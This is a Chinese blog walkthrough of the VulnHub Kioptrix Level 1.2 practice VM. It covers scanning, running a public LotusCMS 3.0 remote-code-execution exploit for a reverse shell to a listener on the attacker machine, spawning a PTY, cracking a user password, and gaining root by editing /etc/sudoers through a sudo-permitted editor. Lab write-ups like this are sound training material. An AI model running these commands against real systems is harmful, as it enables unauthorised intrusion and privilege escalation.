VulhubKioptrix_ Level 1.2靶机详解

于 2024-09-14 15:40:21 发布
阅读量234 收藏 5
点赞数 3
分类专栏: 靶机 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62457642/article/details/142260081
版权

项目地址

https://download.vulnhub.com/kioptrix/KVM3.rar

实验过程

将下载好的靶机导入到VMware中,设置网络模式为NAT模式,然后开启靶机虚拟机

使用nmap进行主机发现,获取靶机ip和端口

nmap 192.168.47.0-254

根据对比可知Kioptrix的ip地址为192.168.47.160,开放了22,80端口

访问网站

四处翻翻

发现一个登录界面且该网站cms为:LotusCMS

不知道账号密码

扫描目录看看

dirb http://192.168.47.160

尝试访问

http://192.168.47.160/modules/


http://192.168.47.160/phpmyadmin/

暂时没啥可用信息

使用searchsploit搜索LotusCMS的历史漏洞,发现该CMS版本为3.0时存在命令执行漏洞

searchsploit LotusCMS

漏洞利用

一个python版本的exp:GitHub - nguyen-ngo/LotusCMS-3.0-RCE-exploit

构造payload反弹shell

python a.py -rh 192.168.47.160 -rp 80 -lh 192.168.47.129

kali开启监听

nc -lvvp 444

监听成功

查看权限,普通用户

获得交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

提权

查看靶机内核版本信息和发行版本信息

uname -a
cat /etc/*-release

使用searchsploit查找符合内核版本和发行版本的历史漏洞

searchsploit Ubuntu

查看/etc/passwd,有利用漏洞

查看家目录

发现有两个文件

查看readme文件,发现有个可用命令

先登录loneferret账户(sqlmap爆破密码)starwars

直接执行 sudo ht不行,看看可以执行什么

export TERM=xterm

再次执行sudo ht

F3查找 /etc/sudoers 然后在loneferrt后加,/bin/bash
F2保存
F10退出

执行/bin/bash提权

sudo /bin/bash

提权成功

秋妤.
关注
专栏目录
OWASP_VM_1.2靶机的下载与安装
冠霖L的博客
07-04 3万+
OWASP(Broken Web Applications Project),是一组易受攻击的Open Web应用程序安全项目,分布在VMware格式的虚拟机上,包含了当前几乎全部类型的漏洞,例如:SQL注入、XSS攻击等等。它是由一家非营利性组织——OWASP 基金会提供持续性支持,可免费下载与使用。 OWASP官网:https://www.owasp.org OWASP中国官网:http:...
KIOPTRIX: LEVEL 1.2-VulnHub靶机学习第四篇
qq_27466929的博客
09-04 1081
VulnHub靶机学习第二篇:KIOPTRIX: LEVEL 1.2
Vulnhub靶机Kioptrix_Level1.2
qq_48904485的博客
03-14 456
运行环境:Virtualbox攻击机:kali(192.168.56.101)靶机Kioptrix_Level1.2(192.168.56.106)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
ctf:OWASP_Broken_Web_Apps_VM_1.2靶机的初步了解
viviliving的专栏
12-02 1045
输入admin/admin显示登录成功。在kali里面可以ping 靶机ip。root/owaspbwa登录后。启动后没有图形界面,是一个中端。
OWASP_VM_1.2靶机的下载、安装及连接访问
ZJLE的博客
08-05 3820
OWASP_VM_1.2靶机的下载、安装及连接访问OWASP_VM_1.2下载OWASP_VM_1.2安装靶机访问不上的问题解决方法 刚刚入门的新手白白们都需要一个可以用来练习的环境,但是dvwa的搭建需要相关环境,所以这里推荐大家在虚拟机上搭建owasp靶机,里面集成了dvwa靶机。 OWASP(Broken Web Applications Project),是一组易受攻击的Open Web应用程序安全项目,分布在VMware格式的虚拟机上,包含了当前几乎全部类型的漏洞,例如:SQL注入、XSS攻击等等
vulnhub靶场】Kioptrix : Level 1.2靶机提权
qq_46421742的博客
07-26 307
免责声明:本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。
ctf:使用vbox导入vmware的OWASP_Broken_Web_Apps_VM_1.2靶机镜像
viviliving的专栏
12-02 395
vbox新建主机,到了选择硬盘的时候,选择使用已有。新增一个vmdk的镜像文件即可。其他默认,点击完成,启动即可。
prime_series_level-1靶场详解
苏生要努力
02-26 1250
将secret.php文件上传成功后,使用msf见天模块(exploit/multi/handler),设置lhost和lport和payload(php/meterpreter/reverse_tcp),开启监听后,浏览器打开secret.php页面。访问一下http://192.168.236.136/dev和http://192.168.236.136/wordpress。msf脚本数据库路径/usr/share/exploitdb/exploits/linux/local。
kali渗透综合靶机(十二)--SickOs1.2靶机
W小哥
03-30 1638
一、靶机下载 下载链接:https://download.vulnhub.com/sickos/sick0s1.2.zip 二、SickOs1.2靶机搭建 将下载好的靶机环境,用VMware导入即可使用,文件->打开 导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可 三、攻击过程 kali IP:192.168.212.6 靶机IP:192.168.212.9 1、主机发...
OWASP_Broken_Web_Apps_VM_1.2
02-16
### OWASP Broken Web Apps VM 1.2:深入解析与实战指南 #### 一、OWASP Broken Web Apps VM 概览 **OWASP Broken Web Apps VM**(虚拟机)是OWASP基金会推出的一个用于安全测试的学习平台。它包含了多个故意设计...
OWASP1.2靶机百度云下载地址.txt
05-16
OWASP 1.2靶机百度云下载
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8459
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
第四周实践课-课堂笔记.pdf
09-16
第四周实践课-课堂笔记
第5周玩转案例分析(2).pdf
09-16
第5周玩转案例分析(2)
第7周实践课安排.pdf
09-16
第7周实践课安排
基于MATLAB m编程的发动机最优工作曲线计算程序(OOL),在此工作曲线下,发动机燃油消耗最小 文件内含:1、发动机最优工
09-16
基于MATLAB m编程的发动机最优工作曲线计算程序(OOL),在此工作曲线下,发动机燃油消耗最小。 文件内含:1、发动机最优工作曲线计算程序m文件;2、发动机万有特性数据excel文件 注:附赠电机效率map绘制程序(m程序)与对应电机效率map数据(excel )
前端监控SDK,可用来收集并上报:代码报错、性能数据、页面录屏、用户行为、白屏检测等个性化指标数据_web-see.zip
最新发布
09-16
前端监控SDK,可用来收集并上报:代码报错、性能数据、页面录屏、用户行为、白屏检测等个性化指标数据_web-see
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值